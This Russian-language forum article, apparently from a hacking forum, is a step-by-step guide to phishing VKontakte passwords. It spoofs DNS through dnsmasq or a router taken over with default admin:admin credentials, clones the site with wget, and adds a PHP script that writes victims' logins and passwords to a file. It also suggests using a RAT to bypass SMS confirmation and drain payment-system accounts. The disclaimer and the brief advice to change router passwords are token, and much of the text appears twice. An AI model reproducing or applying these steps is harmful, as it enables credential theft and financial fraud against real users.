Если у вас есть доступ через RAT к компьютеру жертвы, то с помощью подмены днс вы можете получить необходимые данные от ЭПС жертвы и, минуя смс подтверждение и другие способы защиты, перевести деньги на свой счет. Вы можете заставить жертву ввести код из смс, скачать приложение(ваш вирус) на телефон, подтвердить трейд в Steam. Ограничение составляет лишь ваша фантазия и СИ.
Нужно лишь знать уязвимости различных ЭПС. ПОДСКАЗКА: у qiwi огромной дырой является мобильное приложение
Дисклеймер:
Статья не позывает к действиям, а лишь показывает дыру в безопасности, и как от неё обезопаситься. Ответственность за ваши действия я не несу
Фишинг - это выманивание пароля с помощью атак социальной инженерии. Сегодня рассмотрим одну из них
Посмотреть вложение 34776
Что не так с этой страницей вк?...
На самом деле всё ок, кроме отсутствия https (зелёный замочек). Вряд ли кто то что то заподозрит. Но как так то?
Дело в том, что подменённый dns server преобразовал ваш запрос к вк . Как это устроить?
Натройка dns
Устанавливаем dnsmasq.
Идём в файл конфигурации dnsmasq.conf (на многих ос он расположен в разных местах)
В конец допишите:
Замените ip выше на ваш локальный (узнать можно из ifconfig)
На этом всё
Копирование сайта
Для начала нужно установить apache.
Я думаю нет смысла копипастить сюда убунту вики или арч вики, они объяснят лучше меня.
Установили? Дальше:
Полностью скопировать нам поможет утилита wget
Команда
Скопирует нам сайт в папку vk.com в месте, где открыта консоль
Файлы из этой папки копируем в папку http вашего apache.
Теперь открываем файл index.html
Ищем строки начинающиеся на <form method="post"...
И меняем action на "login.php"
После замены создаём сам login.php с тактм содержанием:
Первые строки сохраняют полученные логин и пароль, а последняя перезагрузит страницу (вместо 192.168.1.55 очевидно надо писать свой ip)
Подмена dns на роутере
Заходим в 192.168.1.1 или 192.168.1.0 (веб интерфейс роутера). Редко кто меняет стандартные admin:admin. Ищем вкладку с dns. Обычно она расположена в вкладке "интернет"
Вставьте свой ip
На этом всё. Включаете apache, и ждёте пары login
assword.
Как уберечь свою сеть:
СМЕНИТЕ admin:admin! И лучше вообще обрубить 80 порт на только проводное соединение. Ну тут уж как знаете.
Нужно лишь знать уязвимости различных ЭПС. ПОДСКАЗКА: у qiwi огромной дырой является мобильное приложение
Дисклеймер:
Статья не позывает к действиям, а лишь показывает дыру в безопасности, и как от неё обезопаситься. Ответственность за ваши действия я не несу
Фишинг - это выманивание пароля с помощью атак социальной инженерии. Сегодня рассмотрим одну из них
Посмотреть вложение 34776
Что не так с этой страницей вк?...
На самом деле всё ок, кроме отсутствия https (зелёный замочек). Вряд ли кто то что то заподозрит. Но как так то?
Дело в том, что подменённый dns server преобразовал ваш запрос к вк . Как это устроить?
Натройка dns
Устанавливаем dnsmasq.
Код:
apt-get intall dnsmasqВ конец допишите:
Код:
domain=com
interface=(ваш интерфейс wifi. Вероятнее всего wlan0)
no-hosts
address=/vk.com/192.168.1.55 (vk.com меняйте на сайт, который вас интересует)На этом всё
Копирование сайта
Для начала нужно установить apache.
Я думаю нет смысла копипастить сюда убунту вики или арч вики, они объяснят лучше меня.
Установили? Дальше:
Полностью скопировать нам поможет утилита wget
Команда
Код:
wget -k -l 7 -p -E vk.comФайлы из этой папки копируем в папку http вашего apache.
Теперь открываем файл index.html
Ищем строки начинающиеся на <form method="post"...
И меняем action на "login.php"
После замены создаём сам login.php с тактм содержанием:
PHP:
<?PHP
$Log = $_POST['email'];
$Pass = $_POST['pass'];
$log = fopen("database.txt", "at");
fwrite($log,"\n $Log:$Pass \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL = 192.168.1.55'></head></html>Подмена dns на роутере
Заходим в 192.168.1.1 или 192.168.1.0 (веб интерфейс роутера). Редко кто меняет стандартные admin:admin. Ищем вкладку с dns. Обычно она расположена в вкладке "интернет"
Вставьте свой ip
На этом всё. Включаете apache, и ждёте пары login
assword.Как уберечь свою сеть:
СМЕНИТЕ admin:admin! И лучше вообще обрубить 80 порт на только проводное соединение. Ну тут уж как знаете.